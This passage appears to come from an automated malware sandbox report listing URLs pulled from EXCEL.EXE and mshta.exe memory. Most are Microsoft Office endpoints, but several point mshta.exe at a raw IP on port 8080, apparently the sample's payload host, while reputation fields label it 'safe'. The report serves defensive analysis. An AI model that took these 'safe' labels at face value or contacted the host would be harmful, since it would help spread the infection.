                      https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyEXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drfalse
                        		high
                        https://cloudfiles.onenote.com/upload.aspxOneNoteCloudFilesConsumerEmbedhttps://onedrive.live.com/emEXCEL.EXE, 00000000.00000003.673968944.0000000012B2E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673679757.0000000012B2E000.00000004.00000001.sdmpfalse
                          		high
                          https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrMBI_SSL_SHORTssl.EXCEL.EXE, 00000000.00000003.673657155.0000000012AEF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673947140.0000000012AF1000.00000004.00000001.sdmpfalse
                            		high
                            https://api.aadrm.com/EXCEL.EXE, 00000000.00000002.965595762.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673746154.0000000012BC0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673968944.0000000012B2E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.867887327.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673679757.0000000012B2E000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drfalse
                            • URL Reputation: safe
                            		unknown
                            https://outlook.office365.com/autodiscover/autodiscover.jsontEXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpfalse
                              		high
                              http://157.230.250.10mshta.exe, 00000006.00000003.699264522.000001BF49937000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.958529847.000001BF49937000.00000004.00000020.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://lookup.onenote.com/lookup/geolocation/v1QEXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpfalse
                                		high
                                http://157.230.250mObjecmshta.exe, 00000006.00000003.699264522.000001BF49937000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.958529847.000001BF49937000.00000004.00000020.sdmpfalse
                                • Avira URL Cloud: safe
                                		low
                                http://157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhmshta.exe, 00000006.00000003.699264522.000001BF49937000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://login.windows.net/common/oauth2/authorizesvSEXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmpfalse
                                  		high
                                  https://api.powerbi.com/v1.0/myorg/groupsDEXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpfalse
                                    		high
                                    https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesEXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965309540.00000000129A0000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drfalse
                                      		high
                                      https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveAppEXCEL.EXE, 00000000.00000002.965069920.000000000F178000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.826754049.000000000F173000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869975155.000000000F173000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678502130.000000000F183000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.674412256.000000000F1BB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829204148.000000000F173000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.826190690.000000000F173000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770810330.000000000F173000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.811332568.000000000F173000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678232726.000000000F183000.00000004.00000001.sdmpfalse
                                        		high
                                        https://api.microsoftstream.com/api/EXCEL.EXE, 00000000.00000003.673746154.0000000012BC0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.674134785.0000000012BC5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drfalse
                                          		high
                                          https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=ImmersiveEXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drfalse
                                            		high
                                            http://157.230.250.107:8080/mfkrmotherfuckeru6y82sasswmshta.exe, 00000006.00000003.699264522.000001BF49937000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://cr.office.comEXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drfalse
                                              		high
                                              https://o365auditrealtimeingestion.manage.office.comUEXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://graph.ppe.windows.net/dWEXCEL.EXE, 00000000.00000003.673843716.0000000012B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965595762.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673700420.0000000012B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.867887327.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770875637.0000000012B42000.00000004.00000001.sdmpfalse
                                                		high
                                                http://weather.service.msn.com/data.aspxSSExcelCShttps://excelcs.EXCEL.EXE, 00000000.00000003.673746154.0000000012BC0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.674134785.0000000012BC5000.00000004.00000001.sdmpfalse
                                                  		high
                                                  https://substrate.office.com6QEXCEL.EXE, 00000000.00000003.673843716.0000000012B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965595762.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673700420.0000000012B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.867887327.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770875637.0000000012B42000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://onedrive.live.com/embed?itesEXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpfalse
                                                    		high
                                                    https://res.getmicrosoftkey.com/api/redemptioneventsEXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileBearerEXCEL.EXE, 00000000.00000003.673746154.0000000012BC0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.674134785.0000000012BC5000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-androidUserVoiceOfEXCEL.EXE, 00000000.00000003.673968944.0000000012B2E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673679757.0000000012B2E000.00000004.00000001.sdmpfalse
                                                      		high
                                                      https://tasks.office.comEXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drfalse
                                                        		high
                                                        https://officeci.azurewebsites.net/api/EXCEL.EXE, 00000000.00000002.965595762.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673690971.0000000012B46000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673980862.0000000012B46000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.867887327.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770875637.0000000012B42000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://login.windows.net/common/oauth2/authorize#EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpfalse
                                                          		high
                                                          https://login.windows.net/common/oauth2/authorize$EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpfalse
                                                            		high
                                                            https://store.office.cn/addinstemplateEXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://login.windows.net/common/oauth2/authorizeMBI_SSL_SHORTEXCEL.EXE, 00000000.00000003.673746154.0000000012BC0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.674134785.0000000012BC5000.00000004.00000001.sdmpfalse
                                                              		high
                                                              https://outlook.office365.com/BEXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmpfalse
                                                                		high
                                                                https://api.powerbi.com/v1.0/myorg/groupsBearerEXCEL.EXE, 00000000.00000003.673746154.0000000012BC0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.674134785.0000000012BC5000.00000004.00000001.sdmpfalse
                                                                  		high
                                                                  https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechEXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drfalse
                                                                    		high
                                                                    https://www.odwebp.svc.msEXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://substrate.office.com5SEXCEL.EXE, 00000000.00000003.673843716.0000000012B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965595762.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673700420.0000000012B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.867887327.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770875637.0000000012B42000.00000004.00000001.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://api.powerbi.com/v1.0/myorg/groupsEXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drfalse
                                                                      		high
                                                                      https://web.microsoftstream.com/video/EXCEL.EXE, 00000000.00000002.965595762.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673746154.0000000012BC0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673690971.0000000012B46000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.674134785.0000000012BC5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673980862.0000000012B46000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.867887327.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770875637.0000000012B42000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drfalse
                                                                        		high
                                                                        https://api.addins.store.officeppe.com/addinstemplateEXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        https://graph.windows.netEXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drfalse
                                                                          		high
                                                                          http://157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehfmshta.exe, 00000006.00000002.957102724.000001BF498C7000.00000004.00000020.sdmp, mshta.exe, 00000006.00000003.699201112.000001BF498CD000.00000004.00000001.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://api.onedrive.comMBIEXCEL.EXE, 00000000.00000003.673746154.0000000012BC0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.674134785.0000000012BC5000.00000004.00000001.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonMBI_SSLpeople.directory.EXCEL.EXE, 00000000.00000003.673746154.0000000012BC0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.674134785.0000000012BC5000.00000004.00000001.sdmpfalse
                                                                            		high
                                                                            https://augloop.office.com/v2)VEXCEL.EXE, 00000000.00000003.673843716.0000000012B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965595762.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673700420.0000000012B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.867887327.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770875637.0000000012B42000.00000004.00000001.sdmpfalse
                                                                              		high
                                                                              https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonEXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drfalse
                                                                                		high
                                                                                https://ncus.contentsync.EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673968944.0000000012B2E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673679757.0000000012B2E000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                https://augloop.office.comLinkRequestApiPageTitleRetrievalhttps://uci.EXCEL.EXE, 00000000.00000003.673746154.0000000012BC0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.674134785.0000000012BC5000.00000004.00000001.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://157.230.250.107:8080/mfkrmotherfuckeru6y82mshta.exe, 00000006.00000003.699233022.000001BF49909000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.958349675.000001BF49909000.00000004.00000020.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=BingMBI_SSL_SHORTssl.EXCEL.EXE, 00000000.00000003.673657155.0000000012AEF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673947140.0000000012AF1000.00000004.00000001.sdmpfalse
                                                                                  		high
                                                                                  https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FacebookeEXCEL.EXE, 00000000.00000002.965309540.00000000129A0000.00000004.00000001.sdmpfalse
                                                                                    		high
                                                                                    https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/EXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drfalse
                                                                                      		high
                                                                                      http://weather.service.msn.com/data.aspxEXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drfalse
                                                                                        		high
                                                                                        https://substrate.office.comPEXCEL.EXE, 00000000.00000003.673843716.0000000012B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965595762.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673700420.0000000012B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.867887327.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770875637.0000000012B42000.00000004.00000001.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosEXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drfalse
                                                                                          		high
                                                                                          https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlEXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drfalse
                                                                                            		high
                                                                                            https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2AzurEXCEL.EXE, 00000000.00000003.673968944.0000000012B2E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673679757.0000000012B2E000.00000004.00000001.sdmpfalse
                                                                                              		high
                                                                                              https://devnull.onenote.comMBI_SSL_SHORTEXCEL.EXE, 00000000.00000003.673968944.0000000012B2E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673679757.0000000012B2E000.00000004.00000001.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		low
                                                                                              https://login.windows.net/common/oauth2/authorizeaEXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmpfalse
                                                                                                		high
                                                                                                https://of.230.250.107:8080/mshta.exe, 00000006.00000003.699233022.000001BF49909000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.958349675.000001BF49909000.00000004.00000020.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		low
                                                                                                https://login.windows.net/common/oauth2/authorizebEXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpfalse
                                                                                                  		high
                                                                                                  https://login.windows.net/common/oauth2/authorizecEXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpfalse
                                                                                                    		high
                                                                                                    https://wus2.contentsync.EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673968944.0000000012B2E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673679757.0000000012B2E000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drfalse
                                                                                                    • URL Reputation: safe
                                                                                                    		unknown
                                                                                                    https://login.windows.net/common/oauth2/authorizedEXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpfalse
                                                                                                      		high
                                                                                                      https://login.windows.net/common/oauth2/authorizeeEXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpfalse
                                                                                                        		high
                                                                                                        https://clients.config.office.net/user/v1.0/ios0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drfalse
                                                                                                          		high
                                                                                                          https://login.windows.net/common/oauth2/authorizefEXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpfalse
                                                                                                            		high
                                                                                                            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrivepEXCEL.EXE, 00000000.00000002.965309540.00000000129A0000.00000004.00000001.sdmpfalse
                                                                                                              		high
                                                                                                              https://login.windows.net/common/oauth2/authorizeXEXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpfalse
                                                                                                                		high
                                                                                                                https://login.windows.net/common/oauth2/authorizeYEXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://o365auditrealtimeingestion.manage.office.comEXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drfalse
                                                                                                                    		high
                                                                                                                    https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileBearerEXCEL.EXE, 00000000.00000003.673746154.0000000012BC0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.674134785.0000000012BC5000.00000004.00000001.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://outlook.office365.com/api/v1.0/me/ActivitiesEXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drfalse
                                                                                                                        		high
                                                                                                                        https://login.windows.net/common/oauth2/authorize_EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpfalse
                                                                                                                          		high
